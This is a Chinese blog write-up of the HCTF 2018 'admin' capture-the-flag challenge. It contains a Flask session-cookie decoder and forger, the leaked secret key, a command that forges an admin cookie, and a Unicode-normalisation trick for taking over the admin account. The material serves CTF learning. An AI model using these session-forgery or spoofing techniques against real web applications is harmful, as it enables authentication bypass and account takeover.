[HCTF 2018]admin

最新推荐文章于 2024-07-15 21:11:55 发布
最新推荐文章于 2024-07-15 21:11:55 发布
阅读量876 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61209261/article/details/125899635
版权

Flask session伪造 Unicode欺骗 安全漏洞 密码绕过
关键词由CSDN通过智能技术生成

这个题之前做过了 这里用另一种做法写写

出题人应该是想让我们用flask session伪造做出来(当然这只是我的猜测

方法一:flask session伪造

开局的界面是登录 看网页代码也没啥 然后就点开看了看有register index啥的

试了试用admin 但密码不对 用万能也没有回显(应该就不是sql注入

然后就去register这些乱搞

搞到这里就看见源码了

有一说一这个源码藏得是真恶心

 文件下下来发现是flask模板

然后就想flask session伪造。

 session直接抓包就得 伪造需要密钥 找了下 在config.py里 ckj123

import os

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

 上解密脚本

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

 然后进行加密(注意要把name改成admin

上加密脚本

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

python session.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'b707f99e8cb332b42ed7745bb9d2294775c9c524ae93a807559a10f17cd0ff3f2c71acc82a6f56ebc588988ccb4dac4a56bfd3214dd8cb126d4aa71695b5a460', 'csrf_token': b'd2f2aab3e15f78cb5bf6c2384fa3e34d9a3b33b5', 'image': b'MZI2', 'name': 'admin', 'user_id': '11'}"
# .eJw9kEGLwjAQhf_KkrMHje1F8CC0FgszpZK2ZC6y69YmY6NLVVwj_veNLniYw8yD9703d7HZDe3JiNl5uLQjsbHfYnYXH19iJjRvryh1XDRVpOXKg88tJnlPyXaKSW0193vgVYzPvYFY--qG2bIvFJoiWUxRVbFW6ZU4nWpZXslpT5wz-qXREiJwqSSuJDXhprqoCKMlWszWRvu1QUWWXOmB0zFl5TPDLzDtA8OgT2WhaotNOkZezMVjJLanYbc5H_ft4V2BktyBCzjGHlTt0BvWXFtiYmCIMCMDsvKYlSEqWvABX85fdtZ9du3bSdU_OXT_yuHTBUGcTXs7Xg6dGInLqR1erxOTiXj8AfLdbg0.YtfwUA.HTQ-w5Lo9g_N8nkgRTt4HT19xys

session就来了

然后用伪造的session去用admin登录 密码随便填就完事了

方法二:Unicode欺骗

这个方法之前做过但是没有写完全

这里补充一下

 在更改密码里面用了strlower 函数

 

 这个nodeprep.prepare存在漏洞。而且login的时候也有strlower一次

 ᴬᴰᴹᴵᴺ这个就会变成admin在登录的时候

下面是unicode的表

Search - Unicode Character Table

具体做法见Web安全学习Week12_「已注销」的博客-CSDN博客里面的第二题

 就完事了

开摆

 

 

怪小生失了神
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HCTF 2018]admin
夜幕下的灯火阑珊的博客
05-12 982
知识点 unicode欺骗 session伪造 解法一:unicode欺骗 查看源码发现 <!-- you are not admin --> 应该是要注册成admin用户 先注册一个admin1用户,登录后在change password页面查看源码,发现 <!-- https://github.com/woadsl1234/hctf_flask/ --> 访问后可取得源码,部分源码如下 def change(): if not current_user.is_
HCTF2018-admin
热门推荐
迷风小白
09-11 1万+
前言 在BUUCTF上看到这题存在三种解法,感觉比较经典,就想着来复现一下顺便学习一波。存在以下三种解法: flask session 伪造 unicode欺骗 条件竞争 审题 拿到题目发现一共就登录注册两个功能,随便注册一个test/test用户 登录之后查看源码发现提示<!-- you are not admin -->,根据提示和题目名估计要让我们登录admin用户就可以得...
HCTF 2018 admin
BlueDoorZz的博客
07-12 512
0x00 题目类型:unicode欺骗,源码泄露,session伪造,条件竞争(Maybe)。 0x01 题目索引界面有登录与注册两个功能,查看源码注释中有you are not admin字样,可能要求以admin身份登陆。先注册一个账号,看看有没有有用的信息。 在改密码的界面发现源码泄漏,去github看源码。源码较长,截取关键部分。 @app.route('/register', methods = ['GET', 'POST']) def register(): if cu
[HCTF 2018] admin
最新发布
pwfortune的博客
07-15 662
然后去更改密码, 记住改后的密码, 再登出, 使用admin的用户登录, 然后用刚刚改的密码,就可以进去了。尝试注册一个 admin 用户, 可以发现这个用户已经存在, 然后就可以尝试弱口令爆破了。将得到的结果 替换掉原来的session ,刷新一下页面就出现了flag。(现在好像已经登不进去了, 时间太久了估计删了 , 借一下别人的图)对于session解密一下 , 可以看到用户为 1 (我注册的)而且在注册的时候以及在修改密码的时候都会使用一次这个函数。随便注册一个账号进去, 到更改密码的里面去,
buuctf之[HCTF 2018]admin
qq_42728977的博客
12-06 577
[HCTF 2018]admin考点session伪造流程思考参考 考点 1、弱口令 2、flask框架 session伪造 3、代码审计 unicode strlower()函数审计 session伪造流程 change页面的源码,泄露后台源码 index源码看得到,要admin登录 所以查看后台源码 发现需要登录认证和session[‘name’]为admin,那就伪造呗。 flask session伪造 session漏洞 流程: 先注册一个用户test/test,并登录 拿到session,
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
CTF学习笔记——[HCTF 2018]admin
Obs_cure的博客
02-15 2705
一、[HCTF 2018]admin 1.题目 2.解题步骤 这个靶场还是很完整的,注册登陆一应俱全,还有留言板。注册和登陆部分尝试了一下,大部分我认知中的注入都被过滤了。于是老老实实注册了个账号。发现里面有个留言板。这不就是师傅们经常攻击的地方吗~ 随便注入的两下没什么反应,看看源码呢~ 嗯?这个注释? 虽然能猜到这个是网站的源码,但由于没有网页的开发经验,所以很遗憾还是没看出什么门道~看WriteUp! 说实话看完之后有点被震撼到。跟着师傅们把三种做法都过一遍~ 这道题的突破口首先是github
hctf2018-admin
Sea_Sand息禅
09-26 985
1、问题分析 熟悉一下网站,有这些功能:注册、登录、上传文章、修改密码、登出 对源码进行观察,发现 源码中存在 <!-- you are not admin --> 可能我们要以管理员身份登录吧。 继续找线索,最后发现在修改密码的源码中有: https://github.com/woadsl1234/hctf_flask/ 这个是网站用的flask源码,然后clone下来就可以进行代...
web-[HCTF 2018]admin
wojiushilsy的博客
04-14 315
题目要点题目内容解题 题目要点 题目内容 解题 ᴬ
Django admin添加自定义Action教程
"Python Django给admin添加Action的方法实例详解" 在Django框架中,admin站点是一个强大的工具,允许开发者快速地管理数据库模型。默认情况下,它提供了基础的数据操作功能,如查看、添加、编辑和删除记录。然而,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值